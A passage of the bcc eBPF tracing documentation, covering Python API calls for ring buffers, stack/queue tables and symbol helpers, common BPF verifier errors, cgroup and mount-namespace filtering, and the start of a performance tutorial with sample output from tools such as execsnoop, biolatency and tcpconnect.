<pre><code class="language-Python"># process event
|
||
def print_event(ctx, data, size):
|
||
event = ct.cast(data, ct.POINTER(Data)).contents
|
||
[...]
|
||
|
||
# loop with callback to print_event
|
||
b["events"].open_ring_buffer(print_event)
|
||
while 1:
|
||
try:
|
||
b.ring_buffer_poll()
|
||
except KeyboardInterrupt:
|
||
exit()
|
||
</code></pre>
|
||
<p>Note that the data structure transferred will need to be declared in C in the BPF program. For example:</p>
|
||
<pre><code class="language-C">// define output data structure in C
|
||
struct data_t {
|
||
u32 pid;
|
||
u64 ts;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
BPF_RINGBUF_OUTPUT(events, 8);
|
||
[...]
|
||
</code></pre>
|
||
<p>In Python, you can either let bcc generate the data structure from C declaration automatically (recommended):</p>
|
||
<pre><code class="language-Python">def print_event(ctx, data, size):
|
||
event = b["events"].event(data)
|
||
[...]
|
||
</code></pre>
|
||
<p>or define it manually:</p>
|
||
<pre><code class="language-Python"># define output data structure in Python
|
||
TASK_COMM_LEN = 16 # linux/sched.h
|
||
class Data(ct.Structure):
|
||
    _fields_ = [("pid", ct.c_uint),
|
||
("ts", ct.c_ulonglong),
|
||
("comm", ct.c_char * TASK_COMM_LEN)]
|
||
|
||
def print_event(ctx, data, size):
|
||
event = ct.cast(data, ct.POINTER(Data)).contents
|
||
[...]
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=open_ring_buffer+path%3Aexamples+language%3Apython&type=Code">search /examples</a></p>
|
||
<h3 id="13-push"><a class="header" href="#13-push">13. push()</a></h3>
|
||
<p>Syntax: <code>table.push(leaf, flags=0)</code></p>
|
||
<p>Push an element onto a Stack or Queue table. Raises an exception if the operation does not succeed.
|
||
Passing QueueStack.BPF_EXIST as a flag causes the Queue or Stack to discard the oldest element if it is full.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=push+path%3Atests+language%3Apython&type=Code">search /tests</a></p>
|
||
<h3 id="14-pop"><a class="header" href="#14-pop">14. pop()</a></h3>
|
||
<p>Syntax: <code>leaf = table.pop()</code></p>
|
||
<p>Pop an element from a Stack or Queue table. Unlike <code>peek()</code>, <code>pop()</code>
|
||
removes the element from the table before returning it.
|
||
Raises a KeyError exception if the operation does not succeed.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=pop+path%3Atests+language%3Apython&type=Code">search /tests</a></p>
|
||
<h3 id="15-peek"><a class="header" href="#15-peek">15. peek()</a></h3>
|
||
<p>Syntax: <code>leaf = table.peek()</code></p>
|
||
<p>Peek the element at the head of a Stack or Queue table. Unlike <code>pop()</code>, <code>peek()</code>
|
||
does not remove the element from the table. Raises an exception if the operation does not succeed.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=peek+path%3Atests+language%3Apython&type=Code">search /tests</a></p>
|
||
<h2 id="helpers-1"><a class="header" href="#helpers-1">Helpers</a></h2>
|
||
<p>Some helper methods provided by bcc. Note that since we're in Python, we can import any Python library and their methods, including, for example, the libraries: argparse, collections, ctypes, datetime, re, socket, struct, subprocess, sys, and time.</p>
|
||
<h3 id="1-ksym"><a class="header" href="#1-ksym">1. ksym()</a></h3>
|
||
<p>Syntax: <code>BPF.ksym(addr)</code></p>
|
||
<p>Translate a kernel memory address into a kernel function name, which is returned.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python">print("kernel function: " + b.ksym(addr))
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=ksym+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=ksym+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="2-ksymname"><a class="header" href="#2-ksymname">2. ksymname()</a></h3>
|
||
<p>Syntax: <code>BPF.ksymname(name)</code></p>
|
||
<p>Translate a kernel name into an address. This is the reverse of ksym. Returns -1 when the function name is unknown.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python">print("kernel address: %x" % b.ksymname("vfs_read"))
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=ksymname+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=ksymname+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="3-sym"><a class="header" href="#3-sym">3. sym()</a></h3>
|
||
<p>Syntax: <code>BPF.sym(addr, pid, show_module=False, show_offset=False)</code></p>
|
||
<p>Translate a memory address into a function name for a pid, which is returned. A pid of less than zero will access the kernel symbol cache. The <code>show_module</code> and <code>show_offset</code> parameters control whether the module in which the symbol lies should be displayed, and whether the instruction offset from the beginning of the symbol should be displayed. These extra parameters default to <code>False</code>.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-python">print("function: " + b.sym(addr, pid))
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=sym+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=sym+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="4-num_open_kprobes"><a class="header" href="#4-num_open_kprobes">4. num_open_kprobes()</a></h3>
|
||
<p>Syntax: <code>BPF.num_open_kprobes()</code></p>
|
||
<p>Returns the number of open k[ret]probes. Can be useful for scenarios where event_re is used while attaching and detaching probes. Excludes perf_events readers.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-python">b.attach_kprobe(event_re=pattern, fn_name="trace_count")
|
||
matched = b.num_open_kprobes()
|
||
if matched == 0:
|
||
print("0 functions matched by \"%s\". Exiting." % args.pattern)
|
||
exit()
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=num_open_kprobes+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=num_open_kprobes+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="5-get_syscall_fnname"><a class="header" href="#5-get_syscall_fnname">5. get_syscall_fnname()</a></h3>
|
||
<p>Syntax: <code>BPF.get_syscall_fnname(name : str)</code></p>
|
||
<p>Return the corresponding kernel function name of the syscall. This helper function will try different prefixes and use the right one to concatenate with the syscall name. Note that the return value may vary between versions of the Linux kernel, which can sometimes cause trouble. (see <a href="https://github.com/iovisor/bcc/issues/2590">#2590</a>)</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-python">print("The function name of %s in kernel is %s" % ("clone", b.get_syscall_fnname("clone")))
|
||
# sys_clone or __x64_sys_clone or ...
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=get_syscall_fnname+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=get_syscall_fnname+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h1 id="bpf-errors"><a class="header" href="#bpf-errors">BPF Errors</a></h1>
|
||
<p>See the "Understanding eBPF verifier messages" section in the kernel source under Documentation/networking/filter.txt.</p>
|
||
<h2 id="1-invalid-mem-access"><a class="header" href="#1-invalid-mem-access">1. Invalid mem access</a></h2>
|
||
<p>This can be due to trying to read memory directly, instead of operating on memory on the BPF stack. All kernel memory reads must be passed via bpf_probe_read_kernel() to copy kernel memory into the BPF stack, which can be done automatically by the bcc rewriter in some cases of simple dereferencing. bpf_probe_read_kernel() does all the required checks.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-sh">bpf: Permission denied
|
||
0: (bf) r6 = r1
|
||
1: (79) r7 = *(u64 *)(r6 +80)
|
||
2: (85) call 14
|
||
3: (bf) r8 = r0
|
||
[...]
|
||
23: (69) r1 = *(u16 *)(r7 +16)
|
||
R7 invalid mem access 'inv'
|
||
|
||
Traceback (most recent call last):
|
||
  File "./tcpaccept", line 179, in &lt;module&gt;
|
||
b = BPF(text=bpf_text)
|
||
File "/usr/lib/python2.7/dist-packages/bcc/__init__.py", line 172, in __init__
|
||
self._trace_autoload()
|
||
File "/usr/lib/python2.7/dist-packages/bcc/__init__.py", line 612, in _trace_autoload
|
||
fn = self.load_func(func_name, BPF.KPROBE)
|
||
File "/usr/lib/python2.7/dist-packages/bcc/__init__.py", line 212, in load_func
|
||
raise Exception("Failed to load BPF program %s" % func_name)
|
||
Exception: Failed to load BPF program kretprobe__inet_csk_accept
|
||
</code></pre>
|
||
<h2 id="2-cannot-call-gpl-only-function-from-proprietary-program"><a class="header" href="#2-cannot-call-gpl-only-function-from-proprietary-program">2. Cannot call GPL only function from proprietary program</a></h2>
|
||
<p>This error happens when a GPL-only helper is called from a non-GPL BPF program. To fix this error, do not use GPL-only helpers from a proprietary BPF program, or relicense the BPF program under a GPL-compatible license. Check which <a href="https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md#helpers">BPF helpers</a> are GPL-only, and what licenses are considered GPL-compatible.</p>
|
||
<p>Example calling <code>bpf_get_stackid()</code>, a GPL-only BPF helper, from a proprietary program (<code>#define BPF_LICENSE Proprietary</code>):</p>
|
||
<pre><code class="language-sh">bpf: Failed to load program: Invalid argument
|
||
[...]
|
||
8: (85) call bpf_get_stackid#27
|
||
cannot call GPL only function from proprietary program
|
||
</code></pre>
|
||
<h1 id="environment-variables"><a class="header" href="#environment-variables">Environment Variables</a></h1>
|
||
<h2 id="1-kernel-source-directory"><a class="header" href="#1-kernel-source-directory">1. Kernel source directory</a></h2>
|
||
<p>eBPF program compilation needs kernel sources or kernel headers with headers
|
||
compiled. In case your kernel sources are at a non-standard location where BCC
|
||
cannot find them, it's possible to provide BCC the absolute path of the location
|
||
by setting <code>BCC_KERNEL_SOURCE</code> to it.</p>
|
||
<h2 id="2-kernel-version-overriding"><a class="header" href="#2-kernel-version-overriding">2. Kernel version overriding</a></h2>
|
||
<p>By default, BCC stores the <code>LINUX_VERSION_CODE</code> in the generated eBPF object
|
||
which is then passed along to the kernel when the eBPF program is loaded.
|
||
Sometimes this is quite inconvenient especially when the kernel is slightly
|
||
updated such as an LTS kernel release. It's extremely unlikely the slight
|
||
mismatch would cause any issues with the loaded eBPF program. By setting
|
||
<code>BCC_LINUX_VERSION_CODE</code> to the version of the kernel that's running, the check
|
||
for verifying the kernel version can be bypassed. This is needed for programs
|
||
that use kprobes. This needs to be encoded in the format: <code>(VERSION * 65536) + (PATCHLEVEL * 256) + SUBLEVEL</code>. For example, if the running kernel is <code>4.9.10</code>,
|
||
then you can set <code>export BCC_LINUX_VERSION_CODE=264458</code> to override the kernel
|
||
version check successfully.</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="special-filtering"><a class="header" href="#special-filtering">Special Filtering</a></h1>
|
||
<p>Some tools have special filtering capabilities. The main use case is to trace
|
||
processes running in containers, but those mechanisms are generic and could
|
||
be used in other cases as well.</p>
|
||
<h2 id="filtering-by-cgroups"><a class="header" href="#filtering-by-cgroups">Filtering by cgroups</a></h2>
|
||
<p>Some tools have an option to filter by cgroup by referencing a pinned BPF hash
|
||
map managed externally.</p>
|
||
<p>Examples of commands:</p>
|
||
<pre><code class="language-sh"># ./opensnoop --cgroupmap /sys/fs/bpf/test01
|
||
# ./execsnoop --cgroupmap /sys/fs/bpf/test01
|
||
# ./tcpconnect --cgroupmap /sys/fs/bpf/test01
|
||
# ./tcpaccept --cgroupmap /sys/fs/bpf/test01
|
||
# ./tcptracer --cgroupmap /sys/fs/bpf/test01
|
||
</code></pre>
|
||
<p>The commands above will only display results from processes that belong to one
|
||
of the cgroups whose id, returned by <code>bpf_get_current_cgroup_id()</code>, is in the
|
||
pinned BPF hash map.</p>
|
||
<p>The BPF hash map can be created by:</p>
|
||
<pre><code class="language-sh"># bpftool map create /sys/fs/bpf/test01 type hash key 8 value 8 entries 128 \
|
||
name cgroupset flags 0
|
||
</code></pre>
|
||
<p>To get a shell in a new cgroup, you can use:</p>
|
||
<pre><code class="language-sh"># systemd-run --pty --unit test bash
|
||
</code></pre>
|
||
<p>The shell will be running in the cgroup
|
||
<code>/sys/fs/cgroup/unified/system.slice/test.service</code>.</p>
|
||
<p>The cgroup id can be discovered using the <code>name_to_handle_at()</code> system call. In
|
||
the examples/cgroupid directory, you will find an example program to get the cgroup
|
||
id.</p>
|
||
<pre><code class="language-sh"># cd examples/cgroupid
|
||
# make
|
||
# ./cgroupid hex /sys/fs/cgroup/unified/system.slice/test.service
|
||
</code></pre>
|
||
<p>or, using Docker:</p>
|
||
<pre><code class="language-sh"># cd examples/cgroupid
|
||
# docker build -t cgroupid .
|
||
# docker run --rm --privileged -v /sys/fs/cgroup:/sys/fs/cgroup \
|
||
cgroupid cgroupid hex /sys/fs/cgroup/unified/system.slice/test.service
|
||
</code></pre>
|
||
<p>This prints the cgroup id as a hexadecimal string in the host endianness such
|
||
as <code>77 16 00 00 01 00 00 00</code>.</p>
|
||
<pre><code class="language-sh"># FILE=/sys/fs/bpf/test01
|
||
# CGROUPID_HEX="77 16 00 00 01 00 00 00"
|
||
# bpftool map update pinned $FILE key hex $CGROUPID_HEX value hex 00 00 00 00 00 00 00 00 any
|
||
</code></pre>
|
||
<p>Now that the shell started by systemd-run has its cgroup id in the BPF hash
|
||
map, bcc tools will display results from this shell. Cgroups can be added and
|
||
removed from the BPF hash map without restarting the bcc tool.</p>
|
||
<p>This feature is useful for integrating bcc tools in external projects.</p>
|
||
<h2 id="filtering-by-mount-by-namespace"><a class="header" href="#filtering-by-mount-by-namespace">Filtering by mount namespace</a></h2>
|
||
<p>The BPF hash map can be created by:</p>
|
||
<pre><code class="language-sh"># bpftool map create /sys/fs/bpf/mnt_ns_set type hash key 8 value 4 entries 128 \
|
||
name mnt_ns_set flags 0
|
||
</code></pre>
|
||
<p>Execute the <code>execsnoop</code> tool filtering only the mount namespaces
|
||
in <code>/sys/fs/bpf/mnt_ns_set</code>:</p>
|
||
<pre><code class="language-sh"># tools/execsnoop.py --mntnsmap /sys/fs/bpf/mnt_ns_set
|
||
</code></pre>
|
||
<p>Start a terminal in a new mount namespace:</p>
|
||
<pre><code class="language-sh"># unshare -m bash
|
||
</code></pre>
|
||
<p>Update the hash map with the mount namespace ID of the terminal above:</p>
|
||
<pre><code class="language-sh">FILE=/sys/fs/bpf/mnt_ns_set
|
||
if [ $(printf '\1' | od -dAn) -eq 1 ]; then
|
||
HOST_ENDIAN_CMD=tac
|
||
else
|
||
HOST_ENDIAN_CMD=cat
|
||
fi
|
||
|
||
NS_ID_HEX="$(printf '%016x' $(stat -Lc '%i' /proc/self/ns/mnt) | sed 's/.\{2\}/&\n/g' | $HOST_ENDIAN_CMD)"
|
||
bpftool map update pinned $FILE key hex $NS_ID_HEX value hex 00 00 00 00 any
|
||
</code></pre>
|
||
<p>Execute a command in this terminal:</p>
|
||
<pre><code class="language-sh"># ping kinvolk.io
|
||
</code></pre>
|
||
<p>On the <code>execsnoop</code> terminal you started above, you'll see that the call is logged:</p>
|
||
<pre><code class="language-sh"># tools/execsnoop.py --mntnsmap /sys/fs/bpf/mnt_ns_set
|
||
[sudo] password for mvb:
|
||
PCOMM PID PPID RET ARGS
|
||
ping 8096 7970 0 /bin/ping kinvolk.io
|
||
</code></pre>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="bcc-tutorial"><a class="header" href="#bcc-tutorial">bcc Tutorial</a></h1>
|
||
<p>This tutorial covers how to use <a href="https://github.com/iovisor/bcc">bcc</a> tools to quickly solve performance, troubleshooting, and networking issues. If you want to develop new bcc tools, see <a href="bcc-documents/tutorial_bcc_python_developer.html">tutorial_bcc_python_developer.md</a> for that tutorial.</p>
|
||
<p>It is assumed for this tutorial that bcc is already installed, and you can run tools like execsnoop successfully. See <a href="https://github.com/iovisor/bcc/tree/master/INSTALL.md">INSTALL.md</a>. This uses enhancements added to the Linux 4.x series.</p>
|
||
<h2 id="observability"><a class="header" href="#observability">Observability</a></h2>
|
||
<p>Some quick wins.</p>
|
||
<h3 id="0-before-bcc"><a class="header" href="#0-before-bcc">0. Before bcc</a></h3>
|
||
<p>Before using bcc, you should start with the Linux basics. One reference is the <a href="https://netflixtechblog.com/linux-performance-analysis-in-60-000-milliseconds-accc10403c55">Linux Performance Analysis in 60,000 Milliseconds</a> post, which covers these commands:</p>
|
||
<ol>
|
||
<li>uptime</li>
|
||
<li>dmesg | tail</li>
|
||
<li>vmstat 1</li>
|
||
<li>mpstat -P ALL 1</li>
|
||
<li>pidstat 1</li>
|
||
<li>iostat -xz 1</li>
|
||
<li>free -m</li>
|
||
<li>sar -n DEV 1</li>
|
||
<li>sar -n TCP,ETCP 1</li>
|
||
<li>top</li>
|
||
</ol>
|
||
<h3 id="1-general-performance"><a class="header" href="#1-general-performance">1. General Performance</a></h3>
|
||
<p>Here is a generic checklist for performance investigations with bcc, first as a list, then in detail:</p>
|
||
<ol>
|
||
<li>execsnoop</li>
|
||
<li>opensnoop</li>
|
||
<li>ext4slower (or btrfs*, xfs*, zfs*)</li>
|
||
<li>biolatency</li>
|
||
<li>biosnoop</li>
|
||
<li>cachestat</li>
|
||
<li>tcpconnect</li>
|
||
<li>tcpaccept</li>
|
||
<li>tcpretrans</li>
|
||
<li>runqlat</li>
|
||
<li>profile</li>
|
||
</ol>
|
||
<p>These tools may be installed on your system under /usr/share/bcc/tools, or you can run them from the bcc github repo under /tools where they have a .py extension. Browse the 50+ tools available for more analysis options.</p>
|
||
<h4 id="11-execsnoop"><a class="header" href="#11-execsnoop">1.1. execsnoop</a></h4>
|
||
<pre><code class="language-sh"># ./execsnoop
|
||
PCOMM PID RET ARGS
|
||
supervise 9660 0 ./run
|
||
supervise 9661 0 ./run
|
||
mkdir 9662 0 /bin/mkdir -p ./main
|
||
run 9663 0 ./run
|
||
[...]
|
||
</code></pre>
|
||
<p>execsnoop prints one line of output for each new process. Check for short-lived processes. These can consume CPU resources, but not show up in most monitoring tools that periodically take snapshots of which processes are running.</p>
|
||
<p>It works by tracing exec(), not fork(), so it will catch many types of new processes but not all (eg, it won't see an application that launches worker processes but doesn't exec() anything else).</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/execsnoop_example.txt">examples</a>.</p>
|
||
<h4 id="12-opensnoop"><a class="header" href="#12-opensnoop">1.2. opensnoop</a></h4>
|
||
<pre><code class="language-sh"># ./opensnoop
|
||
PID COMM FD ERR PATH
|
||
1565 redis-server 5 0 /proc/1565/stat
|
||
1565 redis-server 5 0 /proc/1565/stat
|
||
1565 redis-server 5 0 /proc/1565/stat
|
||
1603 snmpd 9 0 /proc/net/dev
|
||
1603 snmpd 11 0 /proc/net/if_inet6
|
||
1603 snmpd -1 2 /sys/class/net/eth0/device/vendor
|
||
1603 snmpd 11 0 /proc/sys/net/ipv4/neigh/eth0/retrans_time_ms
|
||
1603 snmpd 11 0 /proc/sys/net/ipv6/neigh/eth0/retrans_time_ms
|
||
1603 snmpd 11 0 /proc/sys/net/ipv6/conf/eth0/forwarding
|
||
[...]
|
||
</code></pre>
|
||
<p>opensnoop prints one line of output for each open() syscall, including details.</p>
|
||
<p>Files that are opened can tell you a lot about how applications work: identifying their data files, config files, and log files. Sometimes applications can misbehave, and perform poorly, when they are constantly attempting to read files that do not exist. opensnoop gives you a quick look.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/opensnoop_example.txt">examples</a>.</p>
|
||
<h4 id="13-ext4slower-or-btrfs-xfs-zfs"><a class="header" href="#13-ext4slower-or-btrfs-xfs-zfs">1.3. ext4slower (or btrfs*, xfs*, zfs*)</a></h4>
|
||
<pre><code class="language-sh"># ./ext4slower
|
||
Tracing ext4 operations slower than 10 ms
|
||
TIME COMM PID T BYTES OFF_KB LAT(ms) FILENAME
|
||
06:35:01 cron 16464 R 1249 0 16.05 common-auth
|
||
06:35:01 cron 16463 R 1249 0 16.04 common-auth
|
||
06:35:01 cron 16465 R 1249 0 16.03 common-auth
|
||
06:35:01 cron 16465 R 4096 0 10.62 login.defs
|
||
06:35:01 cron 16464 R 4096 0 10.61 login.defs
|
||
</code></pre>
|
||
<p>ext4slower traces the ext4 file system and times common operations, and then only prints those that exceed a threshold.</p>
|
||
<p>This is great for identifying or exonerating one type of performance issue: it shows individually slow disk I/O via the file system. Disks process I/O asynchronously, and it can be difficult to associate latency at that layer with the latency applications experience. Tracing higher up in the kernel stack, at the VFS -> file system interface, will more closely match what an application suffers. Use this tool to identify if file system latency exceeds a given threshold.</p>
|
||
<p>Similar tools exist in bcc for other file systems: btrfsslower, xfsslower, and zfsslower. There is also fileslower, which works at the VFS layer and traces everything (although at some higher overhead).</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/ext4slower_example.txt">examples</a>.</p>
|
||
<h4 id="14-biolatency"><a class="header" href="#14-biolatency">1.4. biolatency</a></h4>
|
||
<pre><code class="language-sh"># ./biolatency
|
||
Tracing block device I/O... Hit Ctrl-C to end.
|
||
^C
|
||
usecs : count distribution
|
||
0 -> 1 : 0 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 0 | |
|
||
8 -> 15 : 0 | |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 1 | |
|
||
128 -> 255 : 12 |******** |
|
||
256 -> 511 : 15 |********** |
|
||
512 -> 1023 : 43 |******************************* |
|
||
1024 -> 2047 : 52 |**************************************|
|
||
2048 -> 4095 : 47 |********************************** |
|
||
4096 -> 8191 : 52 |**************************************|
|
||
8192 -> 16383 : 36 |************************** |
|
||
16384 -> 32767 : 15 |********** |
|
||
32768 -> 65535 : 2 |* |
|
||
65536 -> 131071 : 2 |* |
|
||
</code></pre>
|
||
<p>biolatency traces disk I/O latency (time from device issue to completion), and when the tool ends (Ctrl-C, or a given interval), it prints a histogram summary of the latency.</p>
|
||
<p>This is great for understanding disk I/O latency beyond the average times given by tools like iostat. I/O latency outliers will be visible at the end of the distribution, as well as multi-modal distributions.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/biolatency_example.txt">examples</a>.</p>
|
||
<h4 id="15-biosnoop"><a class="header" href="#15-biosnoop">1.5. biosnoop</a></h4>
|
||
<pre><code class="language-sh"># ./biosnoop
|
||
TIME(s) COMM PID DISK T SECTOR BYTES LAT(ms)
|
||
0.000004001 supervise 1950 xvda1 W 13092560 4096 0.74
|
||
0.000178002 supervise 1950 xvda1 W 13092432 4096 0.61
|
||
0.001469001 supervise 1956 xvda1 W 13092440 4096 1.24
|
||
0.001588002 supervise 1956 xvda1 W 13115128 4096 1.09
|
||
1.022346001 supervise 1950 xvda1 W 13115272 4096 0.98
|
||
1.022568002 supervise 1950 xvda1 W 13188496 4096 0.93
|
||
[...]
|
||
</code></pre>
|
||
<p>biosnoop prints a line of output for each disk I/O, with details including latency (time from device issue to completion).</p>
|
||
<p>This allows you to examine disk I/O in more detail, and look for time-ordered patterns (eg, reads queueing behind writes). Note that the output will be verbose if your system performs disk I/O at a high rate.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/biosnoop_example.txt">examples</a>.</p>
|
||
<h4 id="16-cachestat"><a class="header" href="#16-cachestat">1.6. cachestat</a></h4>
|
||
<pre><code class="language-sh"># ./cachestat
|
||
HITS MISSES DIRTIES READ_HIT% WRITE_HIT% BUFFERS_MB CACHED_MB
|
||
1074 44 13 94.9% 2.9% 1 223
|
||
2195 170 8 92.5% 6.8% 1 143
|
||
182 53 56 53.6% 1.3% 1 143
|
||
62480 40960 20480 40.6% 19.8% 1 223
|
||
7 2 5 22.2% 22.2% 1 223
|
||
348 0 0 100.0% 0.0% 1 223
|
||
[...]
|
||
</code></pre>
|
||
<p>cachestat prints a one line summary every second (or every custom interval) showing statistics from the file system cache.</p>
|
||
<p>Use this to identify a low cache hit ratio and a high rate of misses, which gives one lead for performance tuning.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/cachestat_example.txt">examples</a>.</p>
|
||
<h4 id="17-tcpconnect"><a class="header" href="#17-tcpconnect">1.7. tcpconnect</a></h4>
|
||
<pre><code class="language-sh"># ./tcpconnect
|
||
PID COMM IP SADDR DADDR DPORT
|
||
1479 telnet 4 127.0.0.1 127.0.0.1 23
|
||
1469 curl 4 10.201.219.236 54.245.105.25 80
|
||
1469 curl 4 10.201.219.236 54.67.101.145 80
|
||
1991 telnet 6 ::1 ::1 23
|
||
2015 ssh 6 fe80::2000:bff:fe82:3ac fe80::2000:bff:fe82:3ac 22
|
||
[...]
|
||
</code></pre>
|
||
<p>tcpconnect prints one line of output for every active TCP connection (eg, via connect()), with details including source and destination addresses.</p>
|
||
<p>Look for unexpected connections that may point to inefficiencies in application configuration, or an intruder.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/tcpconnect_example.txt">examples</a>.</p>
|
||
<h4 id="18-tcpaccept"><a class="header" href="#18-tcpaccept">1.8. tcpaccept</a></h4>
|
||
<pre><code class="language-sh"># ./tcpaccept
|
||
PID COMM IP RADDR LADDR LPORT
|
||
907 sshd 4 192.168.56.1 192.168.56.102 22
|
||
907 sshd 4 127.0.0.1 127.0.0.1 22
|
||
5389 perl 6 1234:ab12:2040:5020:2299:0:5:0 1234:ab12:2040:5020:2299:0:5:0 7001
|
||
[...]
|
||
</code></pre>
|
||
<p>tcpaccept prints one line of output for every passive TCP connection (eg, via accept()), with details including source and destination addresses.</p>
|
||
<p>Look for unexpected connections that may point to inefficiencies in application configuration, or an intruder.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/tcpaccept_example.txt">examples</a>.</p>
|
||
<h4 id="19-tcpretrans"><a class="header" href="#19-tcpretrans">1.9. tcpretrans</a></h4>
|
||
<pre><code class="language-sh"># ./tcpretrans
|
||
TIME PID IP LADDR:LPORT T> RADDR:RPORT STATE
|
||
01:55:05 0 4 10.153.223.157:22 R> 69.53.245.40:34619 ESTABLISHED
|
||
01:55:05 0 4 10.153.223.157:22 R> 69.53.245.40:34619 ESTABLISHED
|
||
01:55:17 0 4 10.153.223.157:22 R> 69.53.245.40:22957 ESTABLISHED
|
||
[...]
|
||
</code></pre>
|
||
<p>tcpretrans prints one line of output for every TCP retransmit packet, with details including source and destination addresses, and kernel state of the TCP connection.</p>
|
||
<p>TCP retransmissions cause latency and throughput issues. For ESTABLISHED retransmits, look for patterns with networks. For SYN_SENT, this may point to target kernel CPU saturation and kernel packet drops.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/tcpretrans_example.txt">examples</a>.</p>
|
||
<h4 id="110-runqlat"><a class="header" href="#110-runqlat">1.10. runqlat</a></h4>
|
||
<pre><code class="language-sh"># ./runqlat
|
||
Tracing run queue latency... Hit Ctrl-C to end.
|
||
^C
|
||
usecs : count distribution
|
||
0 -> 1 : 233 |*********** |
|
||
2 -> 3 : 742 |************************************ |
|
||
4 -> 7 : 203 |********** |
|
||
8 -> 15 : 173 |******** |
|
||
16 -> 31 : 24 |* |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 30 |* |
|
||
128 -> 255 : 6 | |
|
||
256 -> 511 : 3 | |
|
||
512 -> 1023 : 5 | |
|
||
1024 -> 2047 : 27 |* |
|
||
2048 -> 4095 : 30 |* |
|
||
4096 -> 8191 : 20 | |
|
||
8192 -> 16383 : 29 |* |
|
||
16384 -> 32767 : 809 |****************************************|
|
||
32768 -> 65535 : 64 |*** |
|
||
</code></pre>
|
||
<p>runqlat times how long threads were waiting on the CPU run queues, and prints this as a histogram.</p>
|
||
<p>This can help quantify time lost waiting for a turn on CPU, during periods of CPU saturation.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/runqlat_example.txt">examples</a>.</p>
|
||
<h4 id="111-profile"><a class="header" href="#111-profile">1.11. profile</a></h4>
|
||
<pre><code class="language-sh"># ./profile
|
||
Sampling at 49 Hertz of all threads by user + kernel stack... Hit Ctrl-C to end.
|
||
^C
|
||
00007f31d76c3251 [unknown]
|
||
47a2c1e752bf47f7 [unknown]
|
||
- sign-file (8877)
|
||
1
|
||
|
||
ffffffff813d0af8 __clear_user
|
||
ffffffff813d5277 iov_iter_zero
|
||
ffffffff814ec5f2 read_iter_zero
|
||
ffffffff8120be9d __vfs_read
|
||
ffffffff8120c385 vfs_read
|
||
ffffffff8120d786 sys_read
|
||
ffffffff817cc076 entry_SYSCALL_64_fastpath
|
||
00007fc5652ad9b0 read
|
||
- dd (25036)
|
||
4
|
||
|
||
0000000000400542 func_a
|
||
0000000000400598 main
|
||
00007f12a133e830 __libc_start_main
|
||
083e258d4c544155 [unknown]
|
||
- func_ab (13549)
|
||
5
|
||
|
||
[...]
|
||
|
||
ffffffff8105eb66 native_safe_halt
|
||
ffffffff8103659e default_idle
|
||
ffffffff81036d1f arch_cpu_idle
|
||
ffffffff810bba5a default_idle_call
|
||
ffffffff810bbd07 cpu_startup_entry
|
||
ffffffff8104df55 start_secondary
|
||
- swapper/1 (0)
|
||
75
|
||
</code></pre>
|
||
<p>profile is a CPU profiler, which takes samples of stack traces at timed intervals, and prints a summary of unique stack traces and a count of their occurrence.</p>
|
||
<p>Use this tool to understand the code paths that are consuming CPU resources.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/profile_example.txt">examples</a>.</p>
|
||
<h3 id="2-observability-with-generic-tools"><a class="header" href="#2-observability-with-generic-tools">2. Observability with Generic Tools</a></h3>
|
||
<p>In addition to the above tools for performance tuning, below is a checklist for bcc generic tools, first as a list, then in detail:</p>
|
||
<ol>
|
